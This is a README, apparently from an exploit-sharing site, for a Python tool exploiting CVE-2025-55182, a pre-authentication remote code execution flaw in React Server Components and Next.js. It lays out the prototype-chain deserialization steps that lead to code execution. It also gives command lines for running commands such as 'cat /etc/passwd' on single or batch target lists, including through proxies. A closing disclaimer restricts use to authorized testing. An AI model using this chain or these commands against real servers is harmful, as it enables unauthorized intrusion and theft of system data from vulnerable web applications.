## https://sploitus.com/exploit?id=171F37B5-F02E-5916-839E-9544356806F8
# CVE-2025-55182 โ React2Shell
**React Server Components / Next.js Pre-Authentication Remote Code Execution**
| Property | Value |
|---------|-------|
| CVE ID | CVE-2025-55182 |
| CVSS | 10.0 (Critical) |
| CWE | CWE-502: Deserialization of Untrusted Data |
| Type | Pre-Auth RCE |
## Impact Scope
| Component | Affected Versions |
|---------|------------------|
| **React** | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| **Next.js** | 15.0.0 ~ 15.0.4, 15.1.0 ~ 15.1.8, 15.2.x ~ 15.5.6, 16.0.0 ~ 16.0.6 |
| **Related Packages** | react-server-dom-webpack, react-server-dom-turbopack, react-server-dom-parcel |
## Vulnerability Details
This vulnerability exploits a deserialization flaw in the React Server Components (RSC) Flight protocol. Unauthorized remote code execution is achieved by constructing malicious `multipart/form-data` requests. The complete exploitation chain is as follows:
1. A `POST multipart/form-data` request, combined with a `Next-Action` request header, triggers the Server Action path.
2. Chunk โ0โ contains a carefully constructed JSON object (not a wrapped array). The `$1:__proto__:then` property accesses the PENDING state of Chunk 1โs object, making it a thenable object.
3. `$1:constructor:constructor` is resolved as a `Function` constructor via the prototype chain.
4. `Chunk.prototype.then` calls `initializeModelChunk`, which resolves the `value` field to `'{"then":"$B0"}'`.
5. `$B0` blob is resolved to `_formData.get(_prefix + "0)โ,` which is a `Function(code + "0)โ`.
6. The returned function object has a `then` property, which is treated as a thenable object and called, triggering code execution and achieving RCE.
## Dependency Installation
```bash
pip install requests[socks]
```
> The script will automatically attempt to install `requests` and `PySocks` if they are missing. ## Usage
### Single-target RCE
```bash
python CVE-2025-55182.py -u http://target:3000 -c "id"
```
### Batch Exploitation
```bash
python CVE-2025-55182.py -f targets.txt -c "cat /etc/passwd" -o results.txt
```
### Only Detect Vulnerabilities (No Command Execution)
```bash
python CVE-2025-55182.py -u http://target:3000 --check
python CVE-2025-55182.py -f targets.txt --check -o vuln_hosts.txt
```
### Using a Proxy
```bash
# HTTP Proxy
python CVE-2025-55182.py -u http://target:3000 -c "whoami" --proxy http://127.0.0.1:8080
# SOCKS5 Proxy
python CVE-2025-55182.py -f targets.txt -c "id" --proxy socks5://127.0.0.1:1080
```
### Debug Mode
```bash
python CVE-2025-55182.py -u http://target:3000 -c "id" -v
```
## Full Parameter Description
| Parameter | Description | Default |
|---------|-------------|--------|
| `-u, --url` | Single target URL ( with `-f`) | - |
| `-f, --file` | List of target URLs, one per line ( with `-u`) | - |
| `-c, --command` | System command to execute (`--check` mode not required) | - |
| `-o, --output` | Output file for results | `results.txt` |
| `-t, --threads` | Number of concurrent threads | `10` |
| `-v, --verbose` | Display debug output | `False` |
| `--proxy` | Proxy address, supports HTTP and SOCKS5 | - |
| `--timeout` | Request timeout (seconds) | `15` |
| `--check` | Only detect vulnerabilities, no command execution | `False` |
| `--verify-ssl` | Verify TLS certificates | `False` |
## Output Explanation
- **VULN** โ The target has a vulnerability, and command execution was successful.
- **MAYBE** โ There may be a vulnerability (e.g., timeout during reading).
- **ERR** โ Connection error.
- **SAFE** โ No vulnerabilities detected.
Batch scan results will be written to the `-o` specified output file, only targeting targets that have confirmed vulnerabilities. ## Example of `targets.txt` Format
```
http://192.168.1.10:3000
https://app.example.com
http://10.0.0.5:3000/dashboard
# Comment lines will be ignored
```
## Disclaimer
This tool is used solely for **authorized security testing** and **security research** purposes. Users must ensure they have explicit permission from the owners of the target systems. Conducting penetration tests on systems without authorization is illegal, and users must bear all legal responsibilities.